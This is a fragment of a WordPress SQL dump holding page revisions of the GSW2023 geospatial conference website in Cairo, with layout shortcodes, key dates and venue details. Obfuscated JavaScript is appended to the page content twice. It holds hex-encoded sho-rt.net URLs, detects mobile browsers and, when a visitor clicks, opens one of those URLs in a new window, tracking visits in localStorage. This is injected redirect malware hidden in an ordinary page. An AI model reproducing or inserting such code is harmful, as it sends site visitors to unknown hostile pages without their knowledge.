_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','3063-revision-v1','','','2022-11-11 17:21:22','2022-11-11 17:21:22','',3063,'https://gsw2023.com/?p=3303',0,'revision','',0),
(3304,1,'2022-11-11 17:37:49','2022-11-11 17:37:49','','pexels-pixabay-71116','','inherit','open','closed','','pexels-pixabay-71116','','','2022-11-11 17:37:49','2022-11-11 17:37:49','',2631,'https://gsw2023.com/wp-content/uploads/2022/11/pexels-pixabay-71116.jpg',0,'attachment','image/jpeg',0),
(3305,1,'2022-11-11 18:56:40','2022-11-11 18:56:40','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\n<h3></h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 